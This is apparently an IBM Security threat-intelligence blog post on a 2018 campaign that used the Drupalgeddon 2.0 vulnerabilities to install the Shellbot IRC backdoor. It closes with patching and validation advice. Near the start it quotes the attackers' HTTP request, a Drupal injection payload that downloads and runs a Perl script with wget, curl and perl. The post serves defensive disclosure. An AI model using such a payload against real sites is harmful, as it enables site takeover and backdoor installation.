IBM Security’s Managed Security Services (MSS) team monitors the enterprise threat landscape on an ongoing basis, detecting and mapping new threats as they emerge. In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.

This appears to be a financially motivated effort to mass-compromise websites. How can defenders keep websites and underlying systems safe in the face of these evolving threats?

What Is Drupal, and Why Is It a Target?

Like WordPress, Drupal is a content management system (CMS) that is used widely by people who create and maintain websites and applications for all sorts of purposes, both personal and business, private and public. Drupal is open source and, as such, is maintained by a community of users. This is also how its security and vulnerability patching is maintained.

CMSs that are used across a large number of websites are juicy targets for cybercriminals, who commonly automate their attacks in a one-size-fits-all type of operation. Those who target random websites aim to compromise as many as possible and consider the monetization options later.

To do that, malicious actors often pick a vulnerability and then probe for exploitable sites en masse. Those found unpatched or vulnerable for some other reason might fall under the attacker’s control, which could mean a complete compromise of that site. With this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.

ShellBot Attacks Open Backdoors With Drupalgeddon 2.0

In recent investigations into malicious activity targeting enterprises across the globe, our team detected an IP address that was repeatedly sending the same HTTP POST request:

IP Address Suspicious Request /?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget /lip;perl;cd /tmp;curl -O /lip;perl lip;rm -rf lip*&name[#post_render][]=passthru
Scroll to view full table

Further examination of these requests revealed additional sources of similar traffic from a number of command-and-control (C&C) servers, hosting servers that download a Perl script to launch the Shellbot malware and a payload naming pattern that started to paint the picture of a widespread cyberattack. Our team traced the beginning of this campaign to mid-August 2018.

Scan and Deploy

Scanning websites for vulnerable configurations, the attackers leveraged a critical remote code execution (RCE) vulnerability known as CVE-2018-7600, or Drupalgeddon 2.0, to eventually open a backdoor using the Shellbot malware. The scan also included a second vulnerability, CVE-2018-7602, another highly critical RCE flaw. Both these flaws have been patched, but vulnerabilities persists as users delay in patching and upgrading.

As we continued to look into the attack, vulnerable websites were scanned for the /user/register and /user/password pages in the installation phase as attackers tried to brute-force their way in with existing user access details discovered while attempting to “wget” the Perl script for Backdoor.Shellbot.

When successful, the script ran a shell command injection that was used to install the Perl-based bot. The Shellbot instance in our investigation connected to an Internet Relay Chat (IRC) channel and used it as a C&C hub to receive instructions from its controller. The bot contained multiple tools to perform distributed denial-of-service (DDoS) attacks and search for SQL injection weaknesses and other vulnerabilities, including privilege escalation to reach root level on the victimized system.

The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could lead to a potential compromise of the web application with the possibility of spilling over to the underlying operating system as well.

Shellbot Resurfaces

Shellbot itself is an old code that has been around since about 2005, used maliciously to remotely access and control compromised endpoints. Shellbot can open remote command line shells, perform denial-of-service attacks, run tasks and processes, download additional files per the attacker’s command, and change the endpoint’s settings, to name a few.

Shellbot may seem dated and simplistic, but it is in active use by several threat groups. In March 2017, in the heat of Apache Struts (CVE-2017-5638), ShellBot was packaged as the C&C with the PowerBot malware, which deployed cryptocurrency mining modules on infected devices. This combination allowed criminals to generate over $100k in illicit profits from their schemes.

Reviewing most of the Shellbot malware attacks we have detected in recent months, our team identified some variants with instructions to:

  • Terminate all running cryptocurrency mining activities before installing the attacker’s new cryptocurrency miner;
  • Host phishing campaigns;
  • Distribute phishing email spam;
  • Carry out various types of DDoS attacks; and
  • Exfiltrate data via a PHP module to a predetermined email address.

Attackers Bank on Old Vulnerabilities

It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications.

Here are some tips from our security specialists on how to mitigate the risk from existing vulnerabilities and those who use them to compromise web resources and assets:

  • Use updated protocols such as HTTPS and upgrade if need be.
  • Update CMSs to the most recent version and use all available patches.
  • Perform input validation checks on all web applications to ensure that shell commands cannot be executed by any end user. Validate on both client and server side to ensure that scripting and malicious code cannot run on the underlying server or database.
  • Attackers will try to brute-force credentials; make sure that passwords are strong, encrypted and salted. Use two-factor authentication (2FA) to foil automated attacks.

Want to know more? Find indicators of compromise (IoCs) and more technical details about this campaign on X-Force Exchange.

Uncover the Value of Digital Fraud Protection

More from Software Vulnerabilities

Dissecting and Exploiting TCP/IP RCE Vulnerability “EvilESP”

September’s Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: “An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine.” Pure remote vulnerabilities usually yield a lot of interest, but even over a month after the patch, no additional information outside of Microsoft’s advisory had been publicly published. From my side, it had been a…

Self-Checkout This Discord C2

This post was made possible through the contributions of James Kainth, Joseph Lozowski, and Philip Pedersen. In November 2022, during an incident investigation involving a self-checkout point-of-sale (POS) system in Europe, IBM Security X-Force identified a novel technique employed by an attacker to introduce a command and control (C2) channel built upon Discord channel messages. Discord is a chat, voice, and video service enabling users to join and create communities associated with their interests. While Discord and its related software…

Critical Remote Code Execution Vulnerability in SPNEGO Extended Negotiation Security Mechanism

In September 2022, Microsoft patched an information disclosure vulnerability in SPNEGO NEGOEX (CVE-2022-37958). On December 13, Microsoft reclassified the vulnerability as “Critical” severity after IBM Security X-Force Red Security Researcher Valentina Palmiotti discovered the vulnerability could allow attackers to remotely execute code. The vulnerability is in the SPNEGO Extended Negotiation (NEGOEX) Security Mechanism, which allows a client and server to negotiate the choice of security mechanism to use. This vulnerability is a pre-authentication remote code execution vulnerability impacting a wide…

Containers, Security, and Risks within Containerized Environments

Applications have historically been deployed and created in a manner reminiscent of classic shopping malls. First, a developer builds the mall, then creates the various stores inside. The stores conform to the dimensions of the mall and operate within its floor plan. In older approaches to application development, a developer would have a targeted system or set of systems for which they intend to create an application. This targeted system would be the mall. Then, when building the application, they would…